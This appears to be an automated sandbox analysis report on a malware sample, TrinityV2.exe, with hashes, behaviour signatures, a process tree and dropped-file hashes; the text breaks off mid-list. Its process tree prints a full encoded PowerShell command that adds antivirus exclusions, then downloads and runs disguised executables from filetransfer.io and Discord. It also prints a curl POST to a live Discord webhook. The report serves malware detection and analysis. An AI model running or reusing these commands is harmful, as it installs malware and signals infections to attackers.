Analysis

  • max time kernel
    40s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/06/2024, 10:50

General

  • Target

    TrinityV2.exe

  • Size

    516KB

  • MD5

    78b76867f6fc4770ed720616230292ba

  • SHA1

    a6e2cdae0dc8f8ad070ee1b28337036a457e45a2

  • SHA256

    97f2e56dc51fe8d315b213597e35d5b2f5cbeb8d71c6adfe7a0b9d28c3c9dac9

  • SHA512

    99ccd96909f3f31d6fd06150f206c72be4d33389b3f6786c2ae3869d0e9eb19a031522b9220fb3651e283d30afd930d79acb9d68b1f21e2860e5f0859a4aa55c

  • SSDEEP

    1536:UBLUVVU+Gwi0VzRDWcQjK1/41D0jv0VzRDWcQjK1/41D0jrCtVcl:VrDFJ41D0jMrDFJ41D0jrC/Y

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 45 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TrinityV2.exe
    "C:\Users\Admin\AppData\Local\Temp\TrinityV2.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3492
    • C:\Users\Admin\AppData\Roaming\Microsoft.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3840
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZQBjAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB6AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeAB3AHgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAdAByAGEAbgBzAGYAZQByAC4AaQBvAC8AZABhAHQAYQAtAHAAYQBjAGsAYQBnAGUALwBBAFQAaABmAHoANABVADQALwBkAG8AdwBuAGwAbwBhAGQAJwAsACAAPAAjAGwAYgBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBpAHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaAB1AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARwBvAG8AZwBsAGUAQwBoAHIAbwBtAGUALgBlAHgAZQAnACkAKQA8ACMAcAB0AHcAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQB0AHIAYQBuAHMAZgBlAHIALgBpAG8ALwBkAGEAdABhAC0AcABhAGMAawBhAGcAZQAvAEIAcwBKAGUAeABCAE8AWgAvAGQAbwB3AG4AbABvAGEAZAAnACwAIAA8ACMAZABpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGsAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAHEAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBzAC4AZQB4AGUAJwApACkAPAAjAGcAeABqACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAdAByAGEAbgBzAGYAZQByAC4AaQBvAC8AZABhAHQAYQAtAHAAYQBjAGsAYQBnAGUALwBJAG0AWQBXAEkAeABvADMALwBkAG8AdwBuAGwAbwBhAGQAJwAsACAAPAAjAGoAbAB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBkAHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgBmAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQgB5AHAAYQBzAHMALgBlAHgAZQAnACkAKQA8ACMAbQB1AGUAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAMgA4ADYAMQAzADMAOAAwADgAOQA1ADIAOAA1ADQANAAwAC8AMQAyADQAOAA5ADAANQA5ADkAMQA1ADUAOQAzADEAOQA2ADIAMgAvAEYAVQBEAC4AdgBiAHMAPwBlAHgAPQA2ADYANgA1ADUAZABkADcAJgBpAHMAPQA2ADYANgA0ADAAYwA1ADcAJgBoAG0APQA4AGYAOQBmADMAOAA2ADQAZQBhADAAOQBkAGQANQBlADAAYwBhADkAMwBiADMAYgAxAGEANwA2ADQAMgA1ADEANgBmADMAMAA0AGEAZQA0AGIAZgA4ADkAMQBmADcANgBhADMAOAAxAGUANwBiADkAMABmADEANwAzADkAYgBmACYAJwAsACAAPAAjAHQAaAB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQBiAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAgADwAIwBxAGsAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgAuAHYAYgBzACcAKQApADwAIwB2AGMAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AG0AcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegB2AHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARwBvAG8AZwBsAGUAQwBoAHIAbwBtAGUALgBlAHgAZQAnACkAPAAjAHMAcgB6ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAegBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAGkAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBzAC4AZQB4AGUAJwApADwAIwBwAGQAYQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGkAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABzAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQgB5AHAAYQBzAHMALgBlAHgAZQAnACkAPAAjAHQAZwBkACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACAAPAAjAHkAawBoACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAC4AdgBiAHMAJwApADwAIwBqAGYAagAjAD4A"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\Users\Admin\AppData\Roaming\GoogleChrome.exe
          "C:\Users\Admin\AppData\Roaming\GoogleChrome.exe"
          4⤵
          • Executes dropped EXE
          PID:1600
        • C:\Users\Admin\AppData\Roaming\WindowsDefenders.exe
          "C:\Users\Admin\AppData\Roaming\WindowsDefenders.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2236
          • C:\Windows\SYSTEM32\curl.exe
            curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"New connection - NQPTTMRM\"}" https://discord.com/api/webhooks/1248904912948035606/jQ0hEpDwYaobblf8rx0dDp1-SOHiLZ304fsz1gyNFhtAoFDk9GS6k87PbKwKquUelYmg
            5⤵
              PID:4844
          • C:\Users\Admin\AppData\Roaming\Bypass.exe
            "C:\Users\Admin\AppData\Roaming\Bypass.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3864
            • C:\Users\Admin\AppData\Roaming\Bypass.exe
              "C:\Users\Admin\AppData\Roaming\Bypass.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2024
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist"
                6⤵
                  PID:4896
                  • C:\Windows\system32\tasklist.exe
                    tasklist
                    7⤵
                    • Enumerates processes with tasklist
                    PID:1160
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\WindowsDefender.vbs"
              4⤵
                PID:4340

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\VCRUNTIME140.dll

                Filesize

                116KB

                MD5

                be8dbe2dc77ebe7f88f910c61aec691a

                SHA1

                a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                SHA256

                4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                SHA512

                0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\VCRUNTIME140_1.dll

                Filesize

                48KB

                MD5

                f8dfa78045620cf8a732e67d1b1eb53d

                SHA1

                ff9a604d8c99405bfdbbf4295825d3fcbc792704

                SHA256

                a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

                SHA512

                ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_asyncio.pyd

                Filesize

                69KB

                MD5

                70fb0b118ac9fd3292dde530e1d789b8

                SHA1

                4adc8d81e74fc04bce64baf4f6147078eefbab33

                SHA256

                f8305023f6ad81ddc7124b311e500a58914b05a9b072bf9a6d079ea0f6257793

                SHA512

                1ab72ea9f96c6153b9b5d82b01354381b04b93b7d58c0b54a441b6a748c81cccd2fc27bb3b10350ab376ff5ada9d83af67cce17e21ccbf25722baf1f2aef3c98

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_brotli.cp312-win_amd64.pyd

                Filesize

                802KB

                MD5

                9ad5bb6f92ee2cfd29dde8dd4da99eb7

                SHA1

                30a8309938c501b336fd3947de46c03f1bb19dc8

                SHA256

                788acbfd0edd6ca3ef3e97a9487eeaea86515642c71cb11bbcf25721e6573ec8

                SHA512

                a166abcb834d6c9d6b25807adddd25775d81e2951e1bc3e9849d8ae868dedf2e1ee1b6b4b288ddfbd88a63a6fa624e2d6090aa71ded9b90c2d8cbf2d9524fdbf

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_bz2.pyd

                Filesize

                82KB

                MD5

                90f58f625a6655f80c35532a087a0319

                SHA1

                d4a7834201bd796dc786b0eb923f8ec5d60f719b

                SHA256

                bd8621fcc901fa1de3961d93184f61ea71068c436794af2a4449738ccf949946

                SHA512

                b5bb1ecc195700ad7bea5b025503edd3770b1f845f9beee4b067235c4e63496d6e0b19bdd2a42a1b6591d1131a2dc9f627b2ae8036e294300bb6983ecd644dc8

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_cffi_backend.cp312-win_amd64.pyd

                Filesize

                178KB

                MD5

                0572b13646141d0b1a5718e35549577c

                SHA1

                eeb40363c1f456c1c612d3c7e4923210eae4cdf7

                SHA256

                d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7

                SHA512

                67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_ctypes.pyd

                Filesize

                122KB

                MD5

                452305c8c5fda12f082834c3120db10a

                SHA1

                9bab7b3fd85b3c0f2bedc3c5adb68b2579daa6e7

                SHA256

                543ce9d6dc3693362271a2c6e7d7fc07ad75327e0b0322301dd29886467b0b0e

                SHA512

                3d52afdbc8da74262475abc8f81415a0c368be70dbf5b2bd87c9c29ca3d14c44770a5b8b2e7c082f3ece0fd2ba1f98348a04b106a48d479fa6bd062712be8f7c

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_decimal.pyd

                Filesize

                247KB

                MD5

                f78f9855d2a7ca940b6be51d68b80bf2

                SHA1

                fd8af3dbd7b0ea3de2274517c74186cb7cd81a05

                SHA256

                d4ae192bbd4627fc9487a2c1cd9869d1b461c20cfd338194e87f5cf882bbed12

                SHA512

                6b68c434a6f8c436d890d3c1229d332bd878e5777c421799f84d79679e998b95d2d4a013b09f50c5de4c6a85fcceb796f3c486e36a10cbac509a0da8d8102b18

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_hashlib.pyd

                Filesize

                64KB

                MD5

                8baeb2bd6e52ba38f445ef71ef43a6b8

                SHA1

                4132f9cd06343ef8b5b60dc8a62be049aa3270c2

                SHA256

                6c50c9801a5caf0bb52b384f9a0d5a4aa182ca835f293a39e8999cf6edf2f087

                SHA512

                804a4e19ea622646cea9e0f8c1e284b7f2d02f3620199fa6930dbdadc654fa137c1e12757f87c3a1a71ceff9244aa2f598ee70d345469ca32a0400563fe3aa65

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_lzma.pyd

                Filesize

                155KB

                MD5

                cf8de1137f36141afd9ff7c52a3264ee

                SHA1

                afde95a1d7a545d913387624ef48c60f23cf4a3f

                SHA256

                22d10e2d6ad3e3ed3c49eb79ab69a81aaa9d16aeca7f948da2fe80877f106c16

                SHA512

                821985ff5bc421bd16b2fa5f77f1f4bf8472d0d1564bc5768e4dbe866ec52865a98356bb3ef23a380058acd0a25cd5a40a1e0dae479f15863e48c4482c89a03f

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_multiprocessing.pyd

                Filesize

                34KB

                MD5

                c0a06aebbd57d2420037162fa5a3142b

                SHA1

                1d82ba750128eb51070cdeb0c69ac75117e53b43

                SHA256

                5673b594e70d1fdaad3895fc8c3676252b7b675656fb88ef3410bc93bb0e7687

                SHA512

                ddf2c4d22b2371a8602601a05418ef712e03def66e2d8e8814853cdd989ed457efbd6032f4a4a3e9ecca9915d99c249dfd672670046461a9fe510a94da085fbf

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_overlapped.pyd

                Filesize

                54KB

                MD5

                54c021e10f9901bf782c24d648a82b96

                SHA1

                cf173cc0a17308d7d87b62c1169b7b99655458bc

                SHA256

                2e53cc1bfa6e10a4de7e1f4081c5b952746e2d4fa7f8b9929ad818ce20b2cc9f

                SHA512

                e451226ece8c34c73e5b31e06fdc1d99e073e6e0651a0c5e04b0cf011e79d0747da7a5b6c5e94aca44cfceb9e85ce3d85afff081a574d1f53f115e39e9d4ff6c

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_queue.pyd

                Filesize

                31KB

                MD5

                5aa4b057ba2331eed6b4b30f4b3e0d52

                SHA1

                6b9db113c2882743984c3d8b70ec49fc4a136c23

                SHA256

                d43dca0e00c3c11329b68177e967cf5240495c4786f5afa76ac4f267c3a5cdb9

                SHA512

                aa5aa3285ea5c177eca055949c5f550dbd2d2699202a29efe2077213cbc95fff2a36d99eecce249ac04d95baf149b3d8c557a67fc39ead3229f0b329e83447b7

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_socket.pyd

                Filesize

                81KB

                MD5

                439b3ad279befa65bb40ecebddd6228b

                SHA1

                d3ea91ae7cad9e1ebec11c5d0517132bbc14491e

                SHA256

                24017d664af20ee3b89514539345caac83eca34825fcf066a23e8a4c99f73e6d

                SHA512

                a335e1963bb21b34b21aef6b0b14ba8908a5343b88f65294618e029e3d4d0143ea978a5fd76d2df13a918ffab1e2d7143f5a1a91a35e0cc1145809b15af273bd

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_sqlite3.pyd

                Filesize

                121KB

                MD5

                de8b1c6df3ed65d3c96c7c30e0a52262

                SHA1

                8dd69e3506c047b43d7c80cdb38a73a44fd9d727

                SHA256

                f3ca1d6b1ab8bb8d6f35a24fc602165e6995e371226e98ffeeed2eeec253c9df

                SHA512

                a532ef79623beb1195f20537b3c2288a6b922f8e9b6d171ef96090e4cc00e754a129754c19f4d9d5e4b701bcff59e63779656aa559d117ef10590cfafc7404bb

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_ssl.pyd

                Filesize

                173KB

                MD5

                6774d6fb8b9e7025254148dc32c49f47

                SHA1

                212e232da95ec8473eb0304cf89a5baf29020137

                SHA256

                2b6f1b1ac47cb7878b62e8d6bb587052f86ca8145b05a261e855305b9ca3d36c

                SHA512

                5d9247dce96599160045962af86fc9e5439f66a7e8d15d1d00726ec1b3b49d9dd172d667380d644d05cb18e45a5419c2594b4bcf5a16ea01542ae4d7d9a05c6e

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_uuid.pyd

                Filesize

                24KB

                MD5

                b9e2ab3d934221a25f2ad0a8c2247f94

                SHA1

                af792b19b81c1d90d570bdfedbd5789bdf8b9e0c

                SHA256

                d462f34aca50d1f37b9ea03036c881ee4452e1fd37e1b303cd6daaecc53e260e

                SHA512

                9a278bfe339f3cfbd02a1bb177c3bc7a7ce36eb5b4fadaaee590834ad4d29cbe91c8c4c843263d91296500c5536df6ac98c96f59f31676cecdccf93237942a72

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\_wmi.pyd

                Filesize

                35KB

                MD5

                cb0564bc74258cb1320c606917ce5a71

                SHA1

                5b2bfc0d997cc5b7d985bfadddbfc180cb01f7cf

                SHA256

                0342916a60a7b39bbd5753d85e1c12a4d6f990499753d467018b21cefa49cf32

                SHA512

                43f3afa9801fcf5574a30f4d3e7ae6aff65c7716462f9aba5bc8055887a44bf38fba121639d8b31427e738752fe3b085d1d924de2633f4c042433e1960023f38

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\base_library.zip

                Filesize

                1.3MB

                MD5

                c55ad50db3ba71c56c6fb55e7b116550

                SHA1

                6699e6d9c6625634641bcabe01ed2e34eb923ded

                SHA256

                e599cf77eb7d4e4789d50f59ffb858389f3494438517e537e759bdb3e51c2a6b

                SHA512

                402de5d1ddfea29b3fb2bfcb1766afeaa6ea4a37a9ca24e94ed4b1312172dd7795b23c78156091e6a81dfe1c76363c0aea35d0d372b268daaa79d7bef719eb02

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\charset_normalizer\md.cp312-win_amd64.pyd

                Filesize

                10KB

                MD5

                d9e0217a89d9b9d1d778f7e197e0c191

                SHA1

                ec692661fcc0b89e0c3bde1773a6168d285b4f0d

                SHA256

                ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0

                SHA512

                3b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

                Filesize

                120KB

                MD5

                bf9a9da1cf3c98346002648c3eae6dcf

                SHA1

                db16c09fdc1722631a7a9c465bfe173d94eb5d8b

                SHA256

                4107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637

                SHA512

                7371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\libcrypto-3.dll

                Filesize

                4.9MB

                MD5

                51e8a5281c2092e45d8c97fbdbf39560

                SHA1

                c499c810ed83aaadce3b267807e593ec6b121211

                SHA256

                2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a

                SHA512

                98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\libffi-8.dll

                Filesize

                38KB

                MD5

                0f8e4992ca92baaf54cc0b43aaccce21

                SHA1

                c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                SHA256

                eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                SHA512

                6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\libssl-3.dll

                Filesize

                771KB

                MD5

                bfc834bb2310ddf01be9ad9cff7c2a41

                SHA1

                fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c

                SHA256

                41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1

                SHA512

                6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\pyexpat.pyd

                Filesize

                194KB

                MD5

                e2d1c738d6d24a6dd86247d105318576

                SHA1

                384198f20724e4ede9e7b68e2d50883c664eee49

                SHA256

                cdc09fbae2f103196215facd50d108be3eff60c8ee5795dcc80bf57a0f120cdf

                SHA512

                3f9cb64b4456438dea82a0638e977f233faf0a08433f01ca87ba65c7e80b0680b0ec3009fa146f02ae1fdcc56271a66d99855d222e77b59a1713caf952a807da

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\python3.DLL

                Filesize

                66KB

                MD5

                4038af0427bce296ca8f3e98591e0723

                SHA1

                b2975225721959d87996454d049e6d878994cbf2

                SHA256

                a5bb3eb6fdfd23e0d8b2e4bccd6016290c013389e06daae6cb83964fa69e2a4f

                SHA512

                db762442c6355512625b36f112eca6923875d10aaf6476d79dc6f6ffc9114e8c7757ac91dbcd1fb00014122bc7f656115160cf5d62fa7fa1ba70bc71346c1ad3

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\python312.dll

                Filesize

                6.7MB

                MD5

                48ebfefa21b480a9b0dbfc3364e1d066

                SHA1

                b44a3a9b8c585b30897ddc2e4249dfcfd07b700a

                SHA256

                0cc4e557972488eb99ea4aeb3d29f3ade974ef3bcd47c211911489a189a0b6f2

                SHA512

                4e6194f1c55b82ee41743b35d749f5d92a955b219decacf9f1396d983e0f92ae02089c7f84a2b8296a3062afa3f9c220da9b7cd9ed01b3315ea4a953b4ecc6ce

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\select.pyd

                Filesize

                29KB

                MD5

                e1604afe8244e1ce4c316c64ea3aa173

                SHA1

                99704d2c0fa2687997381b65ff3b1b7194220a73

                SHA256

                74cca85600e7c17ea6532b54842e26d3cae9181287cdf5a4a3c50af4dab785e5

                SHA512

                7bf35b1a9da9f1660f238c2959b3693b7d9d2da40cf42c6f9eba2164b73047340d0adff8995049a2fe14e149eba05a5974eee153badd9e8450f961207f0b3d42

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\sqlite3.dll

                Filesize

                1.4MB

                MD5

                31cd2695493e9b0669d7361d92d46d94

                SHA1

                19c1bc5c3856665eca5390a2f9cd59b564c0139b

                SHA256

                17d547994008f1626be2877497912687cb3ebd9a407396804310fd12c85aead4

                SHA512

                9dd8d1b900999e8cea91f3d5f3f72d510f9cc28d7c6768a4046a9d2aa9e78a6ace1248ec9574f5f6e53a6f1bdbfdf153d9bf73dba05788625b03398716c87e1c

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\unicodedata.pyd

                Filesize

                1.1MB

                MD5

                fc47b9e23ddf2c128e3569a622868dbe

                SHA1

                2814643b70847b496cbda990f6442d8ff4f0cb09

                SHA256

                2a50d629895a05b10a262acf333e7a4a31db5cb035b70d14d1a4be1c3e27d309

                SHA512

                7c08683820498fdff5f1703db4ad94ad15f2aa877d044eddc4b54d90e7dc162f48b22828cd577c9bb1b56f7c11f777f9785a9da1867bf8c0f2b6e75dc57c3f53

              • C:\Users\Admin\AppData\Local\Temp\_MEI38642\zstandard\backend_c.cp312-win_amd64.pyd

                Filesize

                513KB

                MD5

                478583eb2f71fa1793829fbde4246bab

                SHA1

                d67331acf14354cfa4cf9ab3a3e0bc2e1288bcf9

                SHA256

                8c7c7929d3a2742f0407619da235d5b298882cc4c7ede3666ac21e9db22f8347

                SHA512

                f4e01565632756036eb38d9663295836b2379b8c4b57de7704a6ee7a24dbcb5a12506ac51d2540991f8fff53ffac1f6fa56814b3a009db6b0cc9f18ab3578fc5

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zvwtfsrl.fnx.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Roaming\Bypass.exe

                Filesize

                16.9MB

                MD5

                76268aa42e445f2ea6b1432ba3a5a5b1

                SHA1

                d688e51a15448c013f53cd5d559d2036cdbe15c5

                SHA256

                ecc80437a13bebb36b3d3107ee475ef1a4993e62727d8a763c86edbe7d39fcc3

                SHA512

                a99bc38ad923f2889f0e032cd78056fca82fa8a1d1cc0b57b0bb956ed511c57b03db474d8e064a5b076bcc2d6a7ab457a462527fc34a92f9f95fb11670e38705

              • C:\Users\Admin\AppData\Roaming\GoogleChrome.exe

                Filesize

                2.6MB

                MD5

                4bce7738ec0f0b1610a09597da99aa4b

                SHA1

                6dc841342371ed2428f6c9c895271add85c5d9f8

                SHA256

                ef6281ca217238d429b2298cba9123c6d15e62fcdc16ddd8e5e4b58c31314e04

                SHA512

                a11e1f7b1ffced240ef81d0da18a2860bd550754c525d559fe3256cab314b78119f7c08510299536c47c14d06708d3bff77050e0eb1106af8abca0423b8d1626

              • C:\Users\Admin\AppData\Roaming\Microsoft.exe

                Filesize

                8KB

                MD5

                a41a3a87afc867264009ab8b7961679d

                SHA1

                c3fc28c24186aa58f582e1a37a70b99cc3d46aec

                SHA256

                0a60908cbd4ff38f389e46d4c31116d57c0182bb6e385f451462efec38b2b7dd

                SHA512

